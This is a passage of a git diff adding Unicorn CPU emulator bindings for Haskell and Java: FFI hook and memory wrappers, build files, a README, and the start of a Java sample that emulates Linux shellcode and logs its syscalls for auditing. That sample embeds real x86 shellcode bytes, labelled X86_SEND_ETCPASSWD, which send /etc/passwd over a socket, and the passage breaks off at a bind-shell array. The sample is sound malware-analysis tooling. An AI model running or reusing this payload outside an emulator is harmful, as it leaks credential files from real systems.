castPtrAndPeek userDataPtr + memoryWriteHook uc address (fromIntegral size) (fromIntegral value) + userData + +-- | Callback function for handling invalid memory access events. 
+type MemoryEventHook a = Engine -- ^ 'Unicorn' engine handle + -> MemoryAccess -- ^ Memory access; read or write + -> Word64 -- ^ Address where the code is being + -- executed + -> Int -- ^ Size of data being read or written + -> Maybe Int -- ^ Value of data being written, or + -- 'Nothing' if read + -> a -- ^ User data passed to tracing APIs + -> IO Bool -- ^ Return 'True' to continue, or + -- 'False' to stop the program (due to + -- invalid memory) + +type CMemoryEventHook = EnginePtr + -> Int32 + -> Word64 + -> Int32 + -> Int64 + -> Ptr () + -> IO Int32 + +foreign import ccall "wrapper" + mkMemoryEventHook :: CMemoryEventHook + -> IO {# type uc_cb_eventmem_t #} + +marshalMemoryEventHook :: Storable a + => MemoryEventHook a + -> IO {# type uc_cb_eventmem_t #} +marshalMemoryEventHook eventMemoryHook = + mkMemoryEventHook $ \ucPtr memAccessI address size value userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + let memAccess = toMemAccess memAccessI + maybeValue = case memAccess of + MemReadUnmapped -> Nothing + MemReadProt -> Nothing + MemWriteUnmapped -> Just $ fromIntegral value + MemWriteProt -> Just $ fromIntegral value + _ -> error "Invalid memory access" + res <- eventMemoryHook uc memAccess address (fromIntegral size) + maybeValue userData + return $ boolToInt res + where boolToInt True = 1 + boolToInt False = 0 + + +------------------------------------------------------------------------------- +-- Hook callback registration (and deletion) +------------------------------------------------------------------------------- + +{# fun variadic uc_hook_add as ucHookAdd + `HookTypeC h' => + { `Engine' + , alloca- `Hook' peek* + , enumToNum `h' + , castFunPtrToPtr `FunPtr b' + , castPtr `Ptr a' + , `Word64' + , `Word64' + } -> `Error' +#} + +{# fun variadic uc_hook_add[int] as ucInsnHookAdd + `HookTypeC h' => + { `Engine' + , alloca- `Hook' peek* + , enumToNum `h' + , castFunPtrToPtr `FunPtr b' + , castPtr `Ptr a' + , `Word64' + , 
`Word64' + , enumToNum `Instruction' + } -> `Error' +#} + +-- | Unregister (remove) a hook callback. +{# fun uc_hook_del as ^ + { `Engine' + , fromIntegral `Hook' + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Helper functions +------------------------------------------------------------------------------- + +toMemAccess :: Integral a + => a + -> MemoryAccess +toMemAccess = + toEnum . fromIntegral diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Unicorn.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Unicorn.chs new file mode 100644 index 0000000..db97552 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Unicorn.chs @@ -0,0 +1,350 @@ +{-# LANGUAGE ForeignFunctionInterface #-} +{-# LANGUAGE ScopedTypeVariables #-} + +{-| +Module : Unicorn.Internal.Unicorn +Description : The Unicorn CPU emulator. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Low-level bindings for the Unicorn CPU emulator framework. + +This module should not be directly imported; it is only exposed because of the +way cabal handles ordering of chs files. +-} +module Unicorn.Internal.Unicorn + ( -- * Types + Architecture(..) + , Mode(..) + , MemoryPermission(..) + , MemoryRegion(..) + , QueryType(..) 
+ , Context + + -- * Function bindings + , ucOpen + , ucQuery + , ucEmuStart + , ucEmuStop + , ucRegWrite + , ucRegRead + , ucRegWriteBatch + , ucRegReadBatch + , ucMemWrite + , ucMemRead + , ucMemMap + , ucMemUnmap + , ucMemProtect + , ucMemRegions + , mkContext + , ucContextAlloc + , ucContextSave + , ucContextRestore + , ucVersion + , ucErrno + , ucStrerror + ) where + +import Control.Applicative +import Control.Monad +import Data.ByteString (ByteString, useAsCStringLen) +import Foreign +import Foreign.C +import Prelude hiding (until) + +import Unicorn.Internal.Util + +{# import Unicorn.Internal.Core #} + +{# context lib = "unicorn" #} + +#include +#include "unicorn_wrapper.h" + +------------------------------------------------------------------------------- +-- Types +------------------------------------------------------------------------------- + +-- | CPU architecture. +{# enum uc_arch as Architecture + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | CPU hardware mode. +{# enum uc_mode as Mode + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Memory permissions. +{# enum uc_prot as MemoryPermission + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Memory region mapped by 'memMap'. Retrieve the list of memory regions with +-- 'memRegions'. 
+data MemoryRegion = MemoryRegion + { + mrBegin :: Word64 -- ^ Begin address of the region (inclusive) + , mrEnd :: Word64 -- ^ End address of the region (inclusive) + , mrPerms :: [MemoryPermission] -- ^ Memory permissions of the region + } + +instance Storable MemoryRegion where + sizeOf _ = {# sizeof uc_mem_region #} + alignment _ = {# alignof uc_mem_region #} + peek p = MemoryRegion + <$> liftA fromIntegral ({# get uc_mem_region->begin #} p) + <*> liftA fromIntegral ({# get uc_mem_region->end #} p) + <*> liftA expandMemPerms ({# get uc_mem_region->perms #} p) + poke p mr = do + {# set uc_mem_region.begin #} p (fromIntegral $ mrBegin mr) + {# set uc_mem_region.end #} p (fromIntegral $ mrEnd mr) + {# set uc_mem_region.perms #} p (combineEnums $ mrPerms mr) + +-- | A pointer to a memory region. +{# pointer *uc_mem_region as MemoryRegionPtr -> MemoryRegion #} + +-- | Query types for the 'query' API. +{# enum uc_query_type as QueryType + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Opaque storage for CPU context, used with the context functions. +{# pointer *uc_context as Context + foreign finalizer uc_free_wrapper as memFree + newtype +#} + +-- | A pointer to a CPU context. +{# pointer *uc_context as ContextPtr -> Context #} + +-- | Make a CPU context out of a context pointer. The returned CPU context will +-- automatically call 'uc_free' when it goes out of scope. 
+mkContext :: ContextPtr + -> IO Context +mkContext ptr = + liftM Context (newForeignPtr memFree ptr) + +------------------------------------------------------------------------------- +-- Emulator control +------------------------------------------------------------------------------- + +{# fun uc_open as ^ + { `Architecture' + , combineEnums `[Mode]' + , alloca- `EnginePtr' peek* + } -> `Error' +#} + +{# fun uc_query as ^ + { `Engine' + , `QueryType' + , alloca- `Int' castPtrAndPeek* + } -> `Error' +#} + +{# fun uc_emu_start as ^ + { `Engine' + , `Word64' + , `Word64' + , `Int' + , `Int' + } -> `Error' +#} + +{# fun uc_emu_stop as ^ + { `Engine' + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Register operations +------------------------------------------------------------------------------- + +{# fun uc_reg_write_wrapper as ucRegWrite + `Reg r' => + { `Engine' + , enumToNum `r' + , withIntegral* `Int64' + } -> `Error' +#} + +{# fun uc_reg_read_wrapper as ucRegRead + `Reg r' => + { `Engine' + , enumToNum `r' + , alloca- `Int64' castPtrAndPeek* + } -> `Error' +#} + +{# fun uc_reg_write_batch_wrapper as ucRegWriteBatch + `Reg r' => + { `Engine' + , withEnums* `[r]' + , integralListToArray* `[Int64]' + , `Int' + } -> `Error' +#} + +{# fun uc_reg_read_batch_wrapper as ucRegReadBatch + `Reg r' => + { `Engine' + , withEnums* `[r]' + , castPtr `Ptr Int64' + , `Int' + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Memory operations +------------------------------------------------------------------------------- + +{# fun uc_mem_write as ^ + { `Engine' + , `Word64' + , withByteStringLen* `ByteString'& + } -> `Error' +#} + +{# fun uc_mem_read as ^ + { `Engine' + , `Word64' + , castPtr `Ptr Word8' + , `Int' + } -> `Error' +#} + +{# fun uc_mem_map as ^ + { `Engine' + , `Word64' + , `Int' + , combineEnums `[MemoryPermission]' + } -> `Error' +#} + +{# fun 
uc_mem_unmap as ^ + { `Engine' + , `Word64' + , `Int' + } -> `Error' +#} + +{# fun uc_mem_protect as ^ + { `Engine' + , `Word64' + , `Int' + , combineEnums `[MemoryPermission]' + } -> `Error' +#} + +{# fun uc_mem_regions as ^ + { `Engine' + , alloca- `MemoryRegionPtr' peek* + , alloca- `Int' castPtrAndPeek* + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Context +------------------------------------------------------------------------------- + +{# fun uc_context_alloc as ^ + { `Engine' + , alloca- `ContextPtr' peek* + } -> `Error' +#} + +{# fun uc_context_save as ^ + { `Engine' + , `Context' + } -> `Error' +#} + +{# fun uc_context_restore as ^ + { `Engine' + , `Context' + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Misc. +------------------------------------------------------------------------------- + +{# fun pure unsafe uc_version as ^ + { id `Ptr CUInt' + , id `Ptr CUInt' + } -> `Int' +#} + +{# fun unsafe uc_errno as ^ + { `Engine' + } -> `Error' +#} + +{# fun pure unsafe uc_strerror as ^ + { `Error' + } -> `String' +#} + +------------------------------------------------------------------------------- +-- Helper functions +------------------------------------------------------------------------------- + +expandMemPerms :: (Integral a, Bits a) + => a + -> [MemoryPermission] +expandMemPerms perms = + -- Only interested in the 3 least-significant bits + let maskedPerms = fromIntegral $ perms .&. 0x7 in + if maskedPerms == 0x0 then + [ProtNone] + else if maskedPerms == 0x7 then + [ProtAll] + else + checkRWE maskedPerms [ProtRead, ProtWrite, ProtExec] + where + checkRWE p (x:xs) = + if p .&. (fromEnum x) /= 0 then + x : checkRWE p xs + else + checkRWE p xs + checkRWE _ [] = + [] + +withIntegral :: (Integral a, Num b, Storable b) + => a + -> (Ptr b -> IO c) + -> IO c +withIntegral = + with . 
fromIntegral + +withByteStringLen :: Integral a + => ByteString + -> ((Ptr (), a) -> IO b) + -> IO b +withByteStringLen bs f = + useAsCStringLen bs $ \(ptr, len) -> f (castPtr ptr, fromIntegral len) + +withEnums :: Enum a + => [a] + -> (Ptr b -> IO c) + -> IO c +withEnums l f = + let ints :: [CInt] = map enumToNum l in + withArray ints $ \ptr -> f (castPtr ptr) + +integralListToArray :: (Integral a, Storable b, Num b) + => [a] + -> (Ptr b -> IO c) + -> IO c +integralListToArray l f = + let l' = map fromIntegral l in + withArray l' $ \array -> f array diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Util.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Util.hs new file mode 100644 index 0000000..edaf343 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Util.hs @@ -0,0 +1,31 @@ +{-| +Module : Unicorn.Internal.Util +Description : Utility (aka helper) functions for the Unicorn emulator. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 +-} +module Unicorn.Internal.Util where + +import Data.Bits +import Foreign + +-- | Combine a list of Enums by performing a bitwise-OR. +combineEnums :: (Enum a, Num b, Bits b) + => [a] + -> b +combineEnums = + foldr ((.|.) <$> enumToNum) 0 + +-- | Cast a pointer and then peek inside it. +castPtrAndPeek :: Storable a + => Ptr b + -> IO a +castPtrAndPeek = + peek . castPtr + +-- | Convert an 'Eum' to a 'Num'. +enumToNum :: (Enum a, Num b) + => a + -> b +enumToNum = + fromIntegral . 
fromEnum diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/cbits/unicorn_wrapper.c b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/cbits/unicorn_wrapper.c new file mode 100644 index 0000000..878518e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/cbits/unicorn_wrapper.c @@ -0,0 +1,50 @@ +#include + +#include "unicorn_wrapper.h" + +void uc_close_wrapper(uc_engine *uc) { + uc_close(uc); +} + +void uc_close_dummy(uc_engine *uc) { +} + +uc_err uc_reg_write_wrapper(uc_engine *uc, int regid, const int64_t *value) { + return uc_reg_write(uc, regid, (const void*) value); +} + +uc_err uc_reg_read_wrapper(uc_engine *uc, int regid, int64_t *value) { + return uc_reg_read(uc, regid, (void*) value); +} + +uc_err uc_reg_write_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count) { + void **valsPtr = malloc(sizeof(void*) * count); + int i; + + for (i = 0; i < count; ++i) { + valsPtr[i] = (void*) &vals[i]; + } + + uc_err ret = uc_reg_write_batch(uc, regs, (void *const*) valsPtr, count); + free(valsPtr); + + return ret; +} + +uc_err uc_reg_read_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count) { + void **valsPtr = malloc(sizeof(void*) * count); + int i; + + for (i = 0; i < count; ++i) { + valsPtr[i] = (void*) &vals[i]; + } + + uc_err ret = uc_reg_read_batch(uc, regs, valsPtr, count); + free(valsPtr); + + return ret; +} + +void uc_free_wrapper(void *mem) { + uc_free(mem); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/include/unicorn_wrapper.h b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/include/unicorn_wrapper.h new file mode 100644 index 0000000..3175716 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/include/unicorn_wrapper.h @@ -0,0 +1,30 @@ +#ifndef UNICORN_WRAPPER_H +#define UNICORN_WRAPPER_H + +#include +#include + +/* + * Wrap Unicorn's uc_close function and ignore the returned error code. 
+ */ +void uc_close_wrapper(uc_engine *uc); + +/* + * Doesn't actually do anything. + */ +void uc_close_dummy(uc_engine *uc); + +/* + * Wrappers for register read/write functions that accept int64_t pointers. + */ +uc_err uc_reg_write_wrapper(uc_engine *uc, int regid, const int64_t *value); +uc_err uc_reg_read_wrapper(uc_engine *uc, int regid, int64_t *value); +uc_err uc_reg_write_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count); +uc_err uc_reg_read_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count); + +/* + * Wrap Unicorn's uc_free function and ignore the returned error code. + */ +void uc_free_wrapper(void *context); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/unicorn.cabal b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/unicorn.cabal new file mode 100644 index 0000000..a16ffe6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/unicorn.cabal @@ -0,0 +1,42 @@ +-- Initial unicorn.cabal generated by cabal init. For further +-- documentation, see http://haskell.org/cabal/users-guide/ + +name: unicorn +version: 0.1.0.0 +category: FFI, Emulation +synopsis: Unicorn CPU emulator engine +description: Haskell bindings for the Unicorn CPU emulator engine. 
+homepage: https://github.com/unicorn-engine/unicorn +author: Adrian Herrera +license: GPL +copyright: (c) 2016, Adrian Herrera +category: System +build-type: Simple +stability: experimental +cabal-version: >= 1.10 +extra-source-files: cbits/ + , include/ + +library + exposed-modules: Unicorn.Internal.Core + Unicorn.Internal.Unicorn + Unicorn.CPU.Arm64 + Unicorn.CPU.Arm + Unicorn.CPU.M68k + Unicorn.CPU.Mips + Unicorn.CPU.Sparc + Unicorn.CPU.X86 + Unicorn.Internal.Hook + Unicorn.Hook + Unicorn + other-modules: Unicorn.Internal.Util + build-depends: base >=4 && <5 + , bytestring >= 0.9.1 + , transformers < 0.6 + hs-source-dirs: src + c-sources: src/cbits/unicorn_wrapper.c + include-dirs: src/include + build-tools: c2hs + pkgconfig-depends: unicorn + default-language: Haskell2010 + ghc-options: -Wall diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile new file mode 100644 index 0000000..73d2072 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile @@ -0,0 +1,29 @@ +.PHONY: gen_const clean jar all lib samples install + +all: gen_const + $(MAKE) -f Makefile.build all + +lib: + $(MAKE) -f Makefile.build lib + +samples: + $(MAKE) -f Makefile.build samples + +jar: + $(MAKE) -f Makefile.build jar + +install: lib jar + $(MAKE) -f Makefile.build install + +uninstall: + $(MAKE) -f Makefile.build uninstall + +gen_const: + cd .. 
&& python const_generator.py java + +clean: + rm -f unicorn/*.class + rm -f samples/*.class + rm -f *.so + rm -f *.dylib + rm -f *.dll diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile.build b/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile.build new file mode 100644 index 0000000..2aaf511 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/Makefile.build @@ -0,0 +1,81 @@ + +.PHONY: gen_const clean + +JAVA_HOME := $(shell jrunscript -e 'java.lang.System.out.println(java.lang.System.getProperty("java.home"));') + +JAVA_INC := $(shell realpath $(JAVA_HOME)/include) + +JAVA_PLATFORM_INC := $(shell dirname `find $(JAVA_INC) -name jni_md.h`) + +UNICORN_INC=../../include + +SAMPLES := $(shell ls samples/*.java) +SRC := $(shell ls unicorn/*.java) + +OS := $(shell uname) +ifeq ($(OS),Darwin) + LIB_EXT=.dylib +else ifeq ($(OS),Linux) + LIB_EXT=.so +else + LIB_EXT=.dll +endif + +CC=gcc +CFLAGS=-fPIC +LDFLAGS=-shared -fPIC +LIBS=-lunicorn +LIBDIR=-L../../ +INCS=-I$(JAVA_INC) -I$(JAVA_PLATFORM_INC) -I$(UNICORN_INC) + +JC=javac +CLASSPATH=./ + +.SUFFIXES: .java .class + +%.class: %.java + $(JC) $(JFLAGS) $< + +OBJS=unicorn_Unicorn.o + +JARFILE=unicorn.jar + +all: lib jar samples + +%.o: %.c + $(CC) -c $(CFLAGS) $(INCS) $< -o $@ + +unicorn_Unicorn.h: unicorn/Unicorn.java + javah unicorn.Unicorn + +unicorn_Unicorn.o: unicorn_Unicorn.c unicorn_Unicorn.h + $(CC) -c $(CFLAGS) $(INCS) $< -o $@ + +libunicorn_java$(LIB_EXT): unicorn_Unicorn.o + +lib: libunicorn_java$(LIB_EXT) unicorn_Unicorn.h + $(CC) -o $< $(LDFLAGS) $(OBJS) $(LIBDIR) $(LIBS) + +samples: $(SAMPLES:.java=.class) +jarfiles: $(SRC:.java=.class) + +jar: jarfiles + jar cf $(JARFILE) unicorn/*.class + +install: lib jar + cp libunicorn_java$(LIB_EXT) $(JAVA_HOME)/lib/ext + cp $(JARFILE) $(JAVA_HOME)/lib/ext + +uninstall: + rm $(JAVA_HOME)/lib/ext/libunicorn_java$(LIB_EXT) + rm $(JAVA_HOME)/lib/ext/$(JARFILE) + +gen_const: + cd .. 
&& python const_generator.py java + +clean: + rm unicorn/*.class + rm samples/*.class + rm *.so + rm *.dylib + rm *.dll diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/README.TXT b/ai_anti_malware/unicorn/unicorn-master/bindings/java/README.TXT new file mode 100644 index 0000000..471adb1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/README.TXT @@ -0,0 +1,37 @@ +This documentation explains how to install the Java binding for Unicorn +from source. + +0. Install the core engine as dependency + + Follow README in the root directory to compile & install the core. + + On *nix, this can simply done by: + + $ sudo ./make.sh install + + +1. Install a JDK for your platform. When done, make sure the JDK tools + are in your PATH. + +2. Change directories into the java bindings, build and install + + $ cd bindings/java + $ make + $ sudo make install + $ make samples + +The samples directory contains some sample code to show how to use Unicorn API. + +- Sample_.java + These show how to access architecture-specific information for each + architecture. + +- Shellcode.java + This shows how to analyze a Linux shellcode. + +- SampleNetworkAuditing.java + Unicorn sample for auditing network connection and file handling in shellcode. + +To uninstall Java binding for Unicorn: + + $ sudo make uninstall diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/SampleNetworkAuditing.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/SampleNetworkAuditing.java new file mode 100644 index 0000000..929ceb9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/samples/SampleNetworkAuditing.java @@ -0,0 +1,429 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. 
+ +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +/* + Unicorn sample for auditing network connection and file handling in shellcode. + Nguyen Tan Cong +*/ + +import unicorn.*; +import java.util.*; + + +public class SampleNetworkAuditing { + + public static int next_id = 3; + public static final int SIZE_REG = 4; + + private static LogChain fd_chains = new LogChain(); + + public static int get_id() { + return next_id++; + } + + public static final long toInt(byte val[]) { + long res = 0; + for (int i = 0; i < val.length; i++) { + long v = val[i] & 0xff; + res = res + (v << (i * 8)); + } + return res; + } + + public static final byte[] toBytes(long val) { + byte[] res = new byte[8]; + for (int i = 0; i < 8; i++) { + res[i] = (byte)(val & 0xff); + val >>>= 8; + } + return res; + } + + + private static class MyInterruptHook implements InterruptHook { + // callback for tracing Linux interrupt + public void hook(Unicorn uc, int intno, Object user) { +// System.err.println(String.format("Interrupt 0x%x, from Unicorn 0x%x", intno, u.hashCode())); + + // only handle Linux syscall + if (intno != 0x80) { + return; + } + Long eax = (Long)uc.reg_read(Unicorn.UC_X86_REG_EAX); + Long ebx = (Long)uc.reg_read(Unicorn.UC_X86_REG_EBX); + Long ecx = (Long)uc.reg_read(Unicorn.UC_X86_REG_ECX); + Long edx = (Long)uc.reg_read(Unicorn.UC_X86_REG_EDX); + Long eip = (Long)uc.reg_read(Unicorn.UC_X86_REG_EIP); + + // System.out.printf(">>> INTERRUPT %d\n", toInt(eax)); + + if (eax == 1) { // sys_exit + System.out.printf(">>> SYS_EXIT\n"); + uc.emu_stop(); + } + else if (eax == 3) { // 
sys_read + long fd = ebx; + long buf = ecx; + long count = edx; + + String uuid = UUID.randomUUID().toString().substring(0, 32); + + byte[] dummy_content = Arrays.copyOfRange(uuid.getBytes(), 0, (int)Math.min(count, uuid.length())); + uc.mem_write(buf, dummy_content); + + String msg = String.format("read %d bytes from fd(%d) with dummy_content(%s)", count, fd, uuid.substring(0, dummy_content.length)); + + fd_chains.add_log(fd, msg); + System.out.printf(">>> %s\n", msg); + } + else if (eax == 4) { // sys_write + long fd = ebx; + long buf = ecx; + long count = edx; + + byte[] content = uc.mem_read(buf, count); + + String msg = String.format("write data=%s count=%d to fd(%d)", new String(content), count, fd); + + System.out.printf(">>> %s\n", msg); + fd_chains.add_log(fd, msg); + } + else if (eax == 5) { // sys_open + long filename_addr = ebx; + long flags = ecx; + long mode = edx; + String filename = read_string(uc, filename_addr); + + Long dummy_fd = new Long(get_id()); + uc.reg_write(Unicorn.UC_X86_REG_EAX, dummy_fd); + + String msg = String.format("open file (filename=%s flags=%d mode=%d) with fd(%d)", filename, flags, mode, dummy_fd); + + fd_chains.create_chain(dummy_fd); + fd_chains.add_log(dummy_fd, msg); + System.out.printf(">>> %s\n", msg); + } + else if (eax == 11) { // sys_execv + // System.out.printf(">>> ebx=0x%x, ecx=0x%x, edx=0x%x\n", ebx, ecx, edx)); + String filename = read_string(uc, ebx); + + System.out.printf(">>> SYS_EXECV filename=%s\n", filename); + } + else if (eax == 63) { // sys_dup2 + fd_chains.link_fd(ecx, ebx); + System.out.printf(">>> SYS_DUP2 oldfd=%d newfd=%d\n", ebx, ecx); + } + else if (eax == 102) { // sys_socketcall + // ref: http://www.skyfree.org/linux/kernel_network/socket.html + Long call = (Long)uc.reg_read(Unicorn.UC_X86_REG_EBX); + Long args = (Long)uc.reg_read(Unicorn.UC_X86_REG_ECX); + + // int sys_socketcall(int call, unsigned long *args) + if (call == 1) { // sys_socket + // err = sys_socket(a0,a1,a[2]) + // int 
sys_socket(int family, int type, int protocol) + long family = toInt(uc.mem_read(args, SIZE_REG)); + long sock_type = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long protocol = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + + Long dummy_fd = new Long(get_id()); + uc.reg_write(Unicorn.UC_X86_REG_EAX, dummy_fd.intValue()); + + if (family == 2) { // AF_INET + String msg = String.format("create socket (%s, %s) with fd(%d)", ADDR_FAMILY.get(family), SOCKET_TYPES.get(sock_type), dummy_fd); + fd_chains.create_chain(dummy_fd); + fd_chains.add_log(dummy_fd, msg); + print_sockcall(msg); + } + else if (family == 3) { // AF_INET6 + } + } + else if (call == 2) { // sys_bind + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long umyaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + + byte[] sock_addr = uc.mem_read(umyaddr, addrlen); + + String msg = String.format("fd(%d) bind to %s", fd, parse_sock_address(sock_addr)); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 3) { // sys_connect + // err = sys_connect(a0, (struct sockaddr *)a1, a[2]) + // int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen) + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long uservaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + + byte[] sock_addr = uc.mem_read(uservaddr, addrlen); + String msg = String.format("fd(%d) connect to %s", fd, parse_sock_address(sock_addr)); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 4) { // sys_listen + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long backlog = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + + String msg = String.format("fd(%d) listened with backlog=%d", fd, backlog); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 5) { // sys_accept + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long 
upeer_sockaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long upeer_addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + + // System.out.printf(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d\n" % (upeer_sockaddr, upeer_addrlen)) + + if (upeer_sockaddr == 0x0) { + print_sockcall(String.format("fd(%d) accept client", fd)); + } + else { + long upeer_len = toInt(uc.mem_read(upeer_addrlen, 4)); + + byte[] sock_addr = uc.mem_read(upeer_sockaddr, upeer_len); + + String msg = String.format("fd(%d) accept client with upeer=%s", fd, parse_sock_address(sock_addr)); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + } + else if (call == 9) { // sys_send + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long buff = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long length = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + long flags = toInt(uc.mem_read(args + SIZE_REG * 3, SIZE_REG)); + + byte[] buf = uc.mem_read(buff, length); + String msg = String.format("fd(%d) send data=%s", fd, new String(buf)); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 11) { // sys_receive + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long ubuf = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + long size = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); + long flags = toInt(uc.mem_read(args + SIZE_REG * 3, SIZE_REG)); + + String msg = String.format("fd(%d) is gonna receive data with size=%d flags=%d", fd, size, flags); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + else if (call == 13) { // sys_shutdown + long fd = toInt(uc.mem_read(args, SIZE_REG)); + long how = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); + + String msg = String.format("fd(%d) is shutted down because of %d", fd, how); + fd_chains.add_log(fd, msg); + print_sockcall(msg); + } + } + } + } + + public static final Hashtable SOCKET_TYPES; + public static final Hashtable ADDR_FAMILY; + static { + SOCKET_TYPES = new Hashtable(); + ADDR_FAMILY = new Hashtable(); 
+ SOCKET_TYPES.put(1L, "SOCK_STREAM"); + SOCKET_TYPES.put(2L, "SOCK_DGRAM"); + SOCKET_TYPES.put(3L, "SOCK_RAW"); + SOCKET_TYPES.put(4L, "SOCK_RDM"); + SOCKET_TYPES.put(5L, "SOCK_SEQPACKET"); + SOCKET_TYPES.put(10L, "SOCK_PACKET"); + + ADDR_FAMILY.put(0L, "AF_UNSPEC"); + ADDR_FAMILY.put(1L, "AF_UNIX"); + ADDR_FAMILY.put(2L, "AF_INET"); + ADDR_FAMILY.put(3L, "AF_AX25"); + ADDR_FAMILY.put(4L, "AF_IPX"); + ADDR_FAMILY.put(5L, "AF_APPLETALK"); + ADDR_FAMILY.put(6L, "AF_NETROM"); + ADDR_FAMILY.put(7L, "AF_BRIDGE"); + ADDR_FAMILY.put(8L, "AF_AAL5"); + ADDR_FAMILY.put(9L, "AF_X25"); + ADDR_FAMILY.put(10L, "AF_INET6"); + ADDR_FAMILY.put(12L, "AF_MAX"); + } + +// http://shell-storm.org/shellcode/files/shellcode-861.php + public static final byte[] X86_SEND_ETCPASSWD = {106,102,88,49,-37,67,49,-46,82,106,1,106,2,-119,-31,-51,-128,-119,-58,106,102,88,67,104,127,1,1,1,102,104,48,57,102,83,-119,-31,106,16,81,86,-119,-31,67,-51,-128,-119,-58,106,1,89,-80,63,-51,-128,-21,39,106,5,88,91,49,-55,-51,-128,-119,-61,-80,3,-119,-25,-119,-7,49,-46,-74,-1,-78,-1,-51,-128,-119,-62,106,4,88,-77,1,-51,-128,106,1,88,67,-51,-128,-24,-44,-1,-1,-1,47,101,116,99,47,112,97,115,115,119,100}; +// http://shell-storm.org/shellcode/files/shellcode-882.php + public static final byte[] X86_BIND_TCP = 